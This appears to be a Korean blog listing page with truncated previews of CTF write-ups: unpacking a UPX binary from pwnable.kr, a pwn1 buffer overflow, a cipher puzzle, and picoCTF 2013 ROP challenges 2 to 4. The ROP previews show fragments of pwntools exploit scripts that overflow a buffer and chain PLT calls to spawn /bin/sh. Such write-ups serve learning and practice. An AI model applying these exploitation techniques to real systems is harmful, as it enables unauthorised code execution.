pwnable.kr flag문제입니다.예전에 동아리 내부 CTF에서 UPX관련된 문제가 나와서 쉽게 풀었던 문제입니다.먼저 실행파일을 다운받고 die까보면 이렇게 UPX로 패킹되어있다고나옵니다.그럼 UPX패킹을 까기 위해서 upx-w 설치해줍니다! (저는 버전391)그후 이렇게 명령어를 쳐서 패킹을 풀어주시고, 다시 die로 까보면 elf파일인 것을 확인할 수 있습니다 그럼 이제 마지막 분석을 하기위해서 ida를 열고, main으로 들어가줬더니 이렇게 flag를 직접 노출시켜줍니다. 링크타고 들어가서 나오는 txt를 그대로 입력해주면?? 어라..안되네요 ㅠㅠ그럼 ida의 string 검색을 이용할게요. 뒤에 :)가 더 붙어있었네요 ㅎㅎ 찾은거같아요!입력하면? (grin)

pwn1입니다. ida로 까서 확인해보면 bof로 v5를 아래 값으로 덮으면 되는데 위 값은 아래와 같습니다. 따라서 checksec을 통해 파일에 걸린 보호기법을 확인해보면 다음과 같은 페이로드를 작성 가능하고 실행하면 flag를 확인할 수 있습니다 :) (grin)

Vinegar문제입니다. 문제를 들어가면 다음과 같음 암호가 나옵니다.초반에는 저거를 키랑 대조해서 풀으려고 엄청 삽질했습니다... sha256이라길래 한번 sha265decrypt에 넣어봤습니다... 후...이런게 해킹이죠

PICO rop4번 마지막문제입니다! ㅎㅎ 이번문제는 소스코드가없으면 풀기 어려워서 소스코드도 같이 첨부하겠습니다. 123456789101112131415161718192021222324252627282930313233343536373839#include #include #include char exec_string[20]; void exec_the_string() { execlp(exec_string, exec_string, NULL);} void call_me_with_cafebabe(int cafebabe) { if (cafebabe == 0xcafebabe) { strcpy(exec_string, "/sh"); }} void call_me_with_two_args(int deadbeef, int ..

pico CTF Rop3번문제 (grin) 취약점 분석! 똑..같다 ㅎ하지만 이번에는 shell을 직접 띄어줘야한다 ㅠㅠ 저번에푼rop공룡같이 풀어본다!! 123456789101112131415161718192021222324252627282930313233from pwn import * r = process("./rop3") payload = ""read_plt = 0x08048360read_got = 0x0804a000write_plt = 0x080483a0shell = "/bin/sh"bss = 0x0804a020offset = 0x9ad60pppr = 0x804855d payload += "A"*140payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bs..

pico CTF 2013 ROP2번문제입니다.보호기법 체크하기! IDA로 까서 취약점을 찾아보겠습니다. 이전문제하고 똑같은 취약점이군요 ㅎㅎ쉽게 풀릴 것 같아서 not_called함수로 들어가보겠습니다. 어라... "/bin/bash"가 아니라 "/bin/data"로 바뀌어있네요.당황 ㅋㅋㅋㅋ조금더 살펴보니 system함수를 내부에서 호출하니, system함수로 ret를 주고, 인자로 "/bin/sh"를 주면 될 것 같습니다. system주소 찾고, "/bin/bash"가젯 찾고, payload 작성하면? 1234567891011121314151617181920from pwn import * r = process("./rop2")system_plt = 0x80483a0shell = 0x08048610 p..